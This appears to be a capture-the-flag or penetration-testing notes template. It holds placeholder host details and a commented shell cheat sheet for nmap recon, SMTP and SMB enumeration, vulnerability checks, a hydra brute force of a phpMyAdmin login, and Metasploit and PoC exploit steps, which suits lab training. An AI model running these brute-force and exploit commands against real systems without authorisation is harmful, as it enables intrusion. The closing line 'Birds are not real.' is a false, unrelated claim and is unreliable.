- Hostname:
- Description:
- IP Address:
- MAC Address: (ref:)
- Domain: WORKGROUP
- TCP Ports and Services
- 22
- OpenSSH
- 80
- HTTP
- 445
- SMBv1
- 22
- UDP Ports and Services
- 53
- DNS
- 53
- OS
- Distro: (ref:)
- Kernel: (ref:)
- Architecture: (ref:)
- Users (ref:)
- root
- administrator
- Vulnerabilities and Exploits
- CVE-2021-1234 (ref:)
- EDB-ID-56789
- cyberphor POC
- Metasploit
- CVE-2021-1234 (ref:)
- Tools Used
- Nmap
- Flag
- ???
- Hints
- n/a
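# --- Recon: target variables and initial nmap scans ---
# TARGET and NAME drive every output path below. new-ctf is a local helper that
# presumably creates the $NAME working tree (with scans/ and loot/) — confirm.
TARGET=10.11.12.13
NAME=demo
new-ctf "$NAME"
cd "$NAME" || exit 1   # original listing had this fused onto the nmap line

# Quick SYN + UDP sweep of nmap's default port set. -sS/-sU need raw sockets,
# hence sudo. --min-rate 1000 trades accuracy for speed: on lossy or
# rate-limited targets probes get dropped and open ports go missing, so treat
# the complete scan below (not this one) as authoritative.
sudo nmap "$TARGET" -sS -sU --min-rate 1000 -oN "scans/$NAME-nmap-initial"

# All 65535 TCP ports plus UDP (UDP is the long pole; expect this to take a while).
sudo nmap "$TARGET" -sS -sU -p- --min-rate 1000 -oN "scans/$NAME-nmap-complete"

# Version detection limited to the ports the complete scan found open.
# print-open-ports-from-nmap-scan is a local helper presumably emitting a
# -p<list> argument; the $( ) is deliberately unquoted so its output is
# word-split into nmap arguments.
sudo nmap "$TARGET" -sV $(print-open-ports-from-nmap-scan "scans/$NAME-nmap-complete") -oN "scans/$NAME-nmap-versions"
# output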
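NSTR

# --- FTP (21): anonymous read/write check ---
# Everything after the `ftp` line is typed at the ftp> prompt, not in bash.
cd loot
touch README.too   # harmless marker used to probe for write access
ftp "$TARGET" 21   # log in as anonymous:anonymous
put README.too     # upload succeeds => writable share; record it and remove the file afterwards
ls
binary             # binary mode so downloads are not mangled by ASCII translation
get file.txt       # single download => readable share
mget *             # pull everything for offline review (run `prompt` first to silence per-file questions)
exit

# Automated enumeration of supported SMTP commands.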
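sudo nmap "$TARGET" -p25 --script smtp-commands -oN "scans/$NAME-nmap-script-smtp-commands"

# Automated enumeration of existing SMTP users.
# The script-args value MUST be quoted: unquoted, bash brace-expands
# {VRFY,EXPN,RCPT} into three separate words and nmap then treats the extra
# "smtp-enum-users.methods=EXPN" / "...=RCPT" tokens as target hostnames.
# VRFY/EXPN/RCPT probing is noisy (every probe is logged by the MTA) and many
# servers answer 252 for any name, so sanity-check with a known-bad user first.
sudo nmap "$TARGET" -p25 --script smtp-enum-users \
  --script-args 'smtp-enum-users.methods={VRFY,EXPN,RCPT}' \
  -oN "scans/$NAME-nmap-script-smtp-enum-users"
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t "$TARGET"

# Automated enumeration of exploitable SMTP vulnerabilities.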
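# Quote the wildcard so the shell cannot expand it against files in the cwd;
# nmap does its own pattern matching on script names. Output path now uses
# $NAME like every other scan (the original had "mailman" hard-coded).
sudo nmap "$TARGET" -p25 --script 'smtp-vuln*' -oN "scans/$NAME-nmap-script-smtp-vuln"

# --- HTTP: content discovery with dirsearch ---
# $PORT and $FULLPATH are never set in this listing; export them first
# (e.g. PORT=80 and FULLPATH=$(pwd)/scans) or the output lands in "/<name>-dirsearch".
dirsearch -u "$TARGET:$PORT" -o "$FULLPATH/$NAME-dirsearch" --format=simple
dirsearch -u "$TARGET:$PORT" -e php -o "$FULLPATH/$NAME-dirsearch-php" --format=simple
# output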
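NSTR

# dirb with its default common.txt list: -r = no recursion, -z10 = 10 ms
# between requests (keeps fragile CTF web servers alive).
dirb "http://$TARGET" -r -z10 -o "scans/$NAME-dirb-common"
# output
NSTR

# nikto tuning 2 = misconfiguration / default-file checks only, which is far
# quieter than a full run. $PORT must already be set.
nikto -h "$TARGET" -p "$PORT" -T 2 -Format txt -o "scans/$NAME-nikto-misconfig"
# output
NSTR

# Shellshock (CVE-2014-6271) probe. The NSE script only hits the URI given by
# http-shellshock.uri (default "/"), so point it at a CGI path found above,
# e.g. --script-args 'http-shellshock.uri=/cgi-bin/status', or it will
# usually report nothing even on a vulnerable host.
sudo nmap "$TARGET" -p80 --script http-shellshock -oN "scans/$NAME-nmap-script-http-shellshock"
# output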
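NSTR

# --- SMB / NetBIOS: null-session enumeration ---
# -N suppresses the password prompt so the empty-user login is an actual null
# session instead of the tool stopping to wait for input. At the rpcclient $>
# prompt try: srvinfo, enumdomusers, enumdomgroups, querydominfo.
rpcclient -U '' -N "$TARGET"
# output
NSTR

# NetBIOS name table: hostname, workgroup/domain, and whether it is a DC.
nbtscan "$TARGET"
# output
NSTR

# Share listing over a null session (-N again avoids the password prompt).
smbclient -L "$TARGET" -N
# output
NSTR

# Per-share read/write permissions; a writable share is worth noting early
# (it is also what the SambaCry check further down needs to be exploitable).
smbmap -H "$TARGET"
# output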
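NSTR
# check if vulnerable to EternalBlue (MS17-010)
# The NSE check reads the SMB transaction response rather than exploiting
# anything; a positive on a Windows host is reliable, but verify the OS first
# (see smb-os-discovery below) because Samba can trip it. Output path renamed
# to the "-nmap-script-" pattern used by the other script scans.
sudo nmap "$TARGET" -p445 --script smb-vuln-ms17-010 -oN "scans/$NAME-nmap-script-smb-vuln-ms17-010"
# output
NSTR
# check if vulnerable to SambaCry (CVE-2017-7494)
# With check-version set the script decides from the Samba version alone and
# does NOT attempt to upload/load a library, so "VULNERABLE" here still needs
# a writable share and a known server-side path before it is exploitable.
# Drop the argument for the active check only if the rules of engagement allow it.
sudo nmap "$TARGET" -p445 --script smb-vuln-cve-2017-7494 \
  --script-args smb-vuln-cve-2017-7494.check-version \
  -oN "scans/$NAME-nmap-smb-vuln-cve-2017-7494"
# output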
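NSTR

# --- MySQL (3306) ---
# The original used $USER, which bash sets to the *local* login name of
# whoever runs this — almost never the account you mean to test. Put the
# candidate account in DB_USER (defaults to root). Add -p to be prompted for
# a password; leaving it off tests for a passwordless account.
mysql -u "${DB_USER:-root}" -h "$TARGET"
# output
NSTR

# --- RDP (3389) ---
# rdp-ntlm-info reads hostname, domain and OS build out of the NTLM
# challenge; no credentials needed.
sudo nmap "$TARGET" -p3389 --script rdp-ntlm-info -oN "scans/$NAME-nmap-script-rdp-ntlm-info"
# output
NSTR
rdesktop -u administrator "$TARGET"   # interactive; prompts for the password

# --- OS fingerprinting ---
# -O needs raw sockets (sudo) and at least one open plus one closed TCP port
# to give a confident guess; when 445 is open the SMB answer below is better.
sudo nmap "$TARGET" -O -oN "scans/$NAME-nmap-os"
# output
NSTR
sudo nmap "$TARGET" -p445 --script smb-os-discovery -oN "scans/$NAME-nmap-os-smb"
# output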
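NSTR
# CMS Web App 9000
# default credentials to try by hand first: admin:admin

# phpMyAdmin login brute force. hydra's http-post-form spec is
# "<path>:<POST body>:<condition>" and the condition is matched as a plain
# substring, not a regex — the original "Cannot|without" therefore never
# matched and every guess would have been reported as a success. Use one
# literal lifted from a real failed login (phpMyAdmin answers "Cannot log in
# to the MySQL server") and mark it as the failure string with F=. Confirm
# the first "hit" manually, add -s <port> if the app is not on 80 (the note
# above mentions 9000), and expect lockouts/rate limiting on a real target.
hydra -l root -P /usr/share/wordlists/rockyou.txt "$TARGET" http-post-form \
  "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:F=Cannot log in"
# output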
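NSTR

# --- Exploit acquisition ---
# Replace "foo" with the product/version string from the -sV scan.
searchsploit foo
mkdir -p edb-id-56789
cd edb-id-56789 || exit 1
searchsploit -x 56789   # read the exploit end to end before running anything

# Third-party PoC: treat it as untrusted code. Read it, pin the commit you
# reviewed, and run it only from the attack box — PoC repositories have
# shipped malware aimed at the people running them.
git clone https://github.com/cyberphor/cve-2021-1234-poc.git
cd cve-2021-1234-poc || exit 1   # original said cve-2021-56789-poc, which does not match the clone

# Metasploit — the lines that follow are typed at the msf prompt.
msfconsole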
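# Commands entered inside msfconsole. msfconsole does not expand shell
# variables, so "$TARGET" below must be typed as the literal address — or run
# it non-interactively from bash where expansion does happen:
#   msfconsole -q -x "use exploit/<path>; set RHOSTS $TARGET; set LHOST tun0; run"
search ???               # e.g. the CVE id or product name from searchsploit
use exploit/???/???
set LHOST tun0           # an interface name is accepted; msf resolves it to its address
set RHOST $TARGET        # newer modules call this RHOSTS — check `show options`
run
NSTR
NSTR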
- Birds are not real.